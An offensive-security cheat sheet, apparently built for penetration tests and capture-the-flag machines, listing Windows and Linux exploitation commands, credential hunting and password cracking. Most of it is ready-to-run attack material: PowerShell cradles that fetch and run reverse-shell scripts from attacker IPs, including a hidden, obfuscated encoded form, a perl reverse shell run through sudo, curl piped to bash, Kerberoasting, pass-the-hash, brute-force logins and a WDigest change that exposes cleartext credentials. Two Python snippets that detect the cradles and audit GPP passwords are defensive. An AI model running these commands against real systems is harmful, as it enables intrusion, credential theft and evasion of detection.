# Exploitation (Attack)

## **Windows Exploitation**

### Basic commands

* Add user

```
net user $username $password /add
```

* Add a user to a group

```
net localgroup "$groupname" $username /add
```

* Add a user to the local Administrators group

```
net localgroup administrators $username /add
```

* Find out Windows system information

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```

* Windows Patch Status

```
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

* Find Plaintext Password

```
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
```

#### Find all those strings in config files

```
dir /s *pass* == *cred* == *vnc* == *.config
```

#### Find all passwords in all files

```
findstr /spin "password" .
```

### Download files from the attacker box (Kali) to the target via PowerShell

```
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.39/rev.ps1')
```

```
powershell.exe invoke-webrequest -uri http://$attackerip/nc.exe -outfile C:\users\user\appdata\local\temp\nc.exe
```

#### Other downloading and uploading techniques

Download Github repo: <https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70>

You need to edit the PowerShell script so that it runs itself without -C or -Command.

For example, using [**Invoke-PowerShellTcp.ps1**](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) in /opt/nishang/Shells/Invoke-PowerShellTcp.ps1:

Invoke this command by appending it to the end of the PowerShell file.

```
Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444
```

![](https://gblobscdn.gitbook.com/assets%2F-Luj_UTA-FG9do0VYXMX%2F-M2Gyy7MYLmYjyw4FWmj%2F-M2Gz6uF6t-igRGi5ozA%2Fimage.png?alt=media\&token=530110e1-4dde-4c5f-8dc9-9a09a093c15d)

***You can copy the file to the victim and execute the command just by invoking DownloadString without the PowerShell -Command*** argument. This technique is widely used to create so-called file-less malware, where the malicious script is executed directly in the memory of the victim machine without dropping any file on the hard disk. It is used to bypass signature-based detection.

```
powershell.exe "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1')"
```

Or you can invoke the command via a PowerShell command string. For example,

```
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444"
```

The same cradle for PowerShell versions 1 and 2:

PS Version 1

```
c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')"
```

PS Version 2

```
c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA
```
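
As a defender-side addition (example code written for this page, not from the original cheat sheet or from nishang), the download-cradle pattern shown above (IEX plus DownloadString, or the same thing hidden inside a -EncodedCommand blob as in the PS version 2 form) can be flagged in PowerShell Script Block Logging (Event ID 4104) or process command lines. The events below are constructed samples, not real captures.

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed sample events in the shape of PowerShell Script Block Logging
# (Event ID 4104 ScriptBlockText) and process command lines; not real captures.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    "IEX(New-Object System.Net.WebClient).DownloadString('http://198.51.100.7/rev.ps1')",
    "Get-ChildItem C:\\Users | Select-Object Name",
    "PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd " + ENCODED_PAYLOAD,
    "Import-Module ActiveDirectory; Get-ADUser -Filter *",
]

# Cradle indicators; case-insensitive because the page's own samples vary the casing.
CRADLE_PATTERNS = [
    ("iex", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("download", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
]
# -EncodedCommand and its short forms (-e, -ec, -enc, ...) followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); None if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def expand_event(event: str) -> str:
    """Append the decoded payload so indicators hidden inside -EncodedCommand become visible."""
    match = ENCODED_FLAG.search(event)
    decoded = decode_encoded_command(match.group(1)) if match else None
    return event if decoded is None else f"{event}\n[decoded] {decoded}"


def flag_download_cradles(events) -> List[Tuple[str, List[str]]]:
    """Return (event, indicator names) for every event that looks like a download cradle."""
    hits = []
    for event in events:
        text = expand_event(event)
        matched = [name for name, pattern in CRADLE_PATTERNS if pattern.search(text)]
        if matched:
            hits.append((event, matched))
    return hits
```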

### Finding passwords in the registry

#### VNC

```
reg query "HKCU\Software\ORL\WinVNC3\Password"
```

#### Windows autologin

```
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
```

```
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword
```

Or via PowerShell, using Get-ItemProperty to read the registry:

```
PS > Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
```

#### SNMP Parameters

```
reg.exe query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
```

#### Putty

```
reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions"
```

#### Search for password in registry

```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### Finding credentials in Groups.xml

```
dir Groups.xml /s
```

On an attacker box, you can decrypt the Group Policy Preferences password (the cpassword value) via:

```
gpp-decrypt $cpassword
```

{% hint style="info" %}
Groups.xml can be found under the path below:

C:\ProgramData\Microsoft\Group Policy\History\{$numbers}\Machine\Preferences\Groups
{% endhint %}

To find more information: <http://www.fuzzysecurity.com/tutorials/16.html>

### **Finding admin credentials from AppData**

```
dir /a C:\Users\$user\AppData\Roaming\Microsoft\Credentials\
```

### **Running commands as a different user by using runas command**

```
runas /user:ACCESS\Administrator /savecred "cmd.exe C:\Users\Administrator\Desktop\root.txt > C:\Users\security\AppData\Local\Temp\test.txt"
```

### Enable RDP in Windows Target

```
C:\Windows\system32>netsh firewall set service remoteadmin enable 
netsh firewall set service remoteadmin enable
Ok.
C:\Windows\system32>netsh firewall set service remotedesktop enable
netsh firewall set service remotedesktop enable
Ok.
```

### Port 88 - Kerberoasting

Once you have a user shell you can start kerberoasting to get other users' credentials.

Without password

```
python GetUserSPNs.py -request active.htb/SVC_TGS
```

With password

```
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
```

Then try cracking the TGS ticket hash with john:

```
john GetUserSPNsOutput.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

Then log in with psexec.py.

```
psexec.py administrator@active.htb
```

You can choose a service name with -service-name to avoid antivirus detection.

```
psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100 -service-name LUALL.exe
```

### Exploiting AD users

You should import the 'activedirectory' module first.&#x20;

```
Import-module activedirectory
```

Add an AD member to a group

```
add-adgroupmember -Identity "$group" -Members $member
```

### Other Useful commands

`strings` prints the printable text embedded in binary files such as executables.

```
root@kali:~/htb/tally# strings tester.exe
!This program cannot be run in DOS mode.
Rich7J
~~~
~~~
SQLSTATE: 
Message: 
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
~~~
~~~
```

Transferring a file to Windows via FTP (run on the target; the trailing space before `>` on the first line keeps cmd.exe from reading `1>` as a redirection):

```
echo open $attackerip 21 > ftp.txt
echo USER offsec>> ftp.txt
echo password>> ftp.txt
echo bin>> ftp.txt
echo GET shell.php>> ftp.txt
echo bye>> ftp.txt
```

Then run

```
ftp -v -n -s:ftp.txt
```

#### List out all schedule tasks

```
schtasks /query /fo LIST /v
```

Other miscellaneous checks:

#### Find GPP Passwords in SYSVOL

`findstr /S cpassword $env:logonserver\sysvol\*.xml` (PowerShell)

`findstr /S cpassword %logonserver%\sysvol\*.xml` (cmd.exe)
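
As a defender-side addition (example code written for this page, not from the original cheat sheet or any tool it names), the SYSVOL sweep above and the Groups.xml lookup earlier in the page can be done as an audit that reports which preference files still carry a cpassword attribute and for which account, without recording the value itself. The XML files and the Policies/{GUID} layout below are constructed samples.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Constructed sample preference files (not real captures); the cpassword value is a placeholder.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="localadmin" changed="2019-01-01 00:00:00">
  <Properties action="U" userName="localadmin" cpassword="CONSTRUCTED_PLACEHOLDER==" neverExpires="1"/>
</User></Groups>"""
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="helpdesk" changed="2019-01-01 00:00:00">
  <Properties action="U" userName="helpdesk" description="no password set through GPP"/>
</User></Groups>"""


def find_cpassword(xml_path):
    """One finding per element carrying a cpassword attribute; the value itself is not recorded."""
    findings = []
    try:
        root = ET.parse(xml_path).getroot()
    except ET.ParseError:
        return findings  # malformed file: skip it rather than abort the sweep
    for elem in root.iter():
        if "cpassword" in elem.attrib:
            # the account attribute differs per preference type (Groups, Services, ScheduledTasks, ...)
            account = elem.get("userName") or elem.get("accountName") or elem.get("runAs") or "?"
            findings.append({"file": str(xml_path), "tag": elem.tag, "account": account})
    return findings


def audit_sysvol(sysvol_root):
    """Walk a SYSVOL-like tree and collect cpassword findings from every XML file."""
    results = []
    for path in sorted(Path(sysvol_root).rglob("*.xml")):
        results.extend(find_cpassword(path))
    return results


def build_sample_tree():
    """Write the constructed files into Policies/{GUID}/{Machine,User}/Preferences/Groups."""
    base = Path(tempfile.mkdtemp())
    policy = base / "Policies" / "{CONSTRUCTED-GUID}"
    for scope, xml_text in (("Machine", SAMPLE_GROUPS_XML), ("User", SAMPLE_CLEAN_XML)):
        folder = policy / scope / "Preferences" / "Groups"
        folder.mkdir(parents=True)
        (folder / "Groups.xml").write_text(xml_text, encoding="utf-8")
    return str(base)
```

Point `audit_sysvol` at a copy of `\\<dc>\SYSVOL\<domain>\Policies` to run it against a real share.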

#### Run a PowerShell prompt as a different user, without loading the profile on the machine (replace DOMAIN and USER)

`runas /user:DOMAIN\USER /noprofile powershell.exe`

#### Insert a registry key to enable WDigest on newer versions of Windows

`reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1`

## Linux Exploitation

### Spawning an interactive TTY Linux shell

```
python -c 'import pty; pty.spawn("/bin/sh")'
export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin
```

Then press Ctrl-Z and run:

```
stty raw -echo 
fg
```

> Type reset and hit return.

### Exploiting directory permissions

#### Find any writable directories

```
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
```

Or use

```
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null
```

#### Finding only executable folders

```
find / -perm -o=x -type d 2>/dev/null
```

#### Finding writable and executable folders

```
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null
```

#### Find commands you are allowed to run as root with no password

```
sudo -l
```

You'll see output similar to the example below. As you can see, user shelly can run /usr/bin/perl as root with no password.


e.g. if you are allowed to run perl as root, you can get a reverse shell straight away:

```
sudo perl -e 'use Socket;$i="10.10.14.43";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
```

If this doesn't give you any hints, check the kernel version of the victim machine:

```
uname -ar 
cat /proc/version 
cat /etc/issue 
cat /etc/*-release 
cat /etc/lsb-release # Debian based 
cat /etc/redhat-release # Redhat based
```

Try googling the kernel version and privilege-escalation (PE) exploits to try out.

#### Check the bash history

```
cat .bash_history
```

#### Check the processes that are running

```
ps aux | grep $service
```

### Finding Plaintext Passwords in web server

#### Plaintext Password in /var/www/html/\*.php

```
cat /var/www/html/config.php | grep password
```

#### In mail

```
grep -r $item /var/spool/mail
```

Or using LinEnum.sh

```
./LinEnum.sh -t -k password
```

#### Checking the services that are listening

```
netstat -anlp
```

### GTFOBins

SUID

```
find / -perm -u=s -type f 2>/dev/null
```

SGID

```
find / -perm -g=s -type f 2>/dev/null
```

### Automation Tools

There are three useful automation tools that I use the most:

#### LinEnum.sh

<https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh>

```
curl http://$attackerip/LinEnum.sh | /bin/bash
```

Or, once the script is on the target:

```
chmod +x LinEnum.sh
./LinEnum.sh
```

#### pspy

pspy is a command line tool designed to snoop on processes without need for root permissions.

Cron job watching with pspy, using the example target from the pspy repository:

```
~/pspy (master) $ make example
```

### Other useful commands

List file capabilities

```
getcap -r / 2>/dev/null
```

## Password Cracking

Below is the cracking methodology used in CTF challenges.

### Creating a password list

1\) Create your own dictionary, or combine two wordlists by

```
cat wordlist >> wordlist2
```

2\) Create a customised wordlist from an HTML page

```
curl http://example.com > example.txt
html2dic example.txt
```

Or use **CeWL**

```
cewl -w createWordlist.txt -m 6 https://www.example.com
```

-w is the output wordlist file; -m is the minimum word length.

### Cracking Tools

To identify the hash type, use either of the commands below, both built into Kali:

```
hash-identifier
hashid
```

{% hint style="info" %}
Online Tools to find Hash Type

<http://www.onlinehashcrack.com/hash-identification.php>

<https://md5hashing.net/hash_type_checker>
{% endhint %}

#### Cracking Hash

Two Kali built-in tools can be used, *hashcat* and *john*.

Hashcat

```
hashcat -m 13100 -a 0 -o found.txt admin.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
```

* -m: hash mode; 13100 denotes Kerberos 5 TGS-REP etype 23
* -a: attack mode; 0 denotes straight (wordlist)
* -o: output file
* -r: rules file applied to each wordlist entry

John the ripper

```
john --wordlist=wordlist.txt dump.txt
```

### KeePass password

```
keepass2john CEH.kdbx > crackthis.hash
john --wordlist=wordlist.txt crackthis.hash
```

Or

```
hashcat64.exe -m 13400 .\crackthis.hash .\rockyou.txt
```

### PuTTY key (.ppk) to OpenSSH key

```
puttygen my_private_key.ppk -O private-openssh -o alice.key
chmod 600 alice.key
```

### **Linux shadow password**

First you need to combine the passwd file with the shadow file using the unshadow program.

```
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=wordlist.txt unshadowed.txt
```

### Decoding Base64

```
cat $encodedfile | base64 --decode > decodedfile.txt
```

{% embed url="https://www.base64decode.org/" %}

#### Cracking a zip file password

```
fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip
```

#### Convert Hex to Binary

```
cat hex.txt | xxd -r -p
```

### Online Tools

{% embed url="https://crackstation.net/" %}

{% embed url="https://hashkiller.co.uk/" %}

### Cracking passwords for services

#### Port 22 - SSH

```
hydra -l root -P wordlist.txt $targetip ssh
hydra -L userlist.txt -P pass.txt ssh://$targetip
```

#### Cracking a private RSA key passphrase

```
python ssh2john.py user_rsa > crackable.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crackable.txt
```

#### Port 161 - SNMP

```
hydra -P wordlist.txt -v 102.168.0.101 snmp
```

#### Port 3389 - RDP

```
ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101
```

#### Port 80/443 - htaccess

**Password protect a directory with htaccess**

**Step 1**

Create a directory that you want to password-protect, and create a .htaccess file inside that directory. Content of .htaccess:

```
AuthType Basic
AuthName "Password Protected Area"
AuthUserFile /var/www/html/test/.htpasswd
Require valid-user
```

Create .htpasswd file

```
htpasswd -cb .htpasswd test admin
service apache2 restart
```

This will now create a file called .htpasswd with the user: test and the password: admin

If the directory does not display a login prompt, you might have to change the **apache2.conf** file to include:

```
<Directory /var/www/html/test>
    AllowOverride AuthConfig
</Directory>
```

**Then bruteforce with**

```
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
```

**Apache Tomcat**

```
hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http://10.10.10.95:8080/manager/html
```

#### HTTP POST Login Form

```
hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect*"
```

### Pass The Hash

You can authenticate to services with a valid username and the NTLM hash value, without knowing the plaintext password.

#### SMB PTH

```
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
```

```
pth-winexe -U administrator //$targetip cmd
pth-winexe -U admin%$lmhash:$nthash //$targetip cmd
```

e.g.

```
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
```

```
smbclient //$targetip/C$ -U "$targetuser" --pw-nt-hash $hash
```

#### WinRM and RDP PTH

With evil-winrm (WinRM) <https://github.com/Hackplayers/evil-winrm>

```
evil-winrm -u "$targetuser" --hash $hash -i $targetip
```

With freerdp-x11 (RDP), passing the NT hash:

```
apt-get install freerdp-x11
xfreerdp /u:admin /d:win7 /pth:$nthash /v:$targetip
```

## Misc: Windows password check in SAM

Local account hashes live in two registry hive files, SYSTEM and SAM. Backup copies are typically found at:

```
SAM hive (%SYSTEMROOT% is usually C:\Windows)
%SYSTEMROOT%\repair\SAM
windows\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM

SYSTEM hive
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
```

Then extract the hashed passwords:

```
pwdump system sam
```
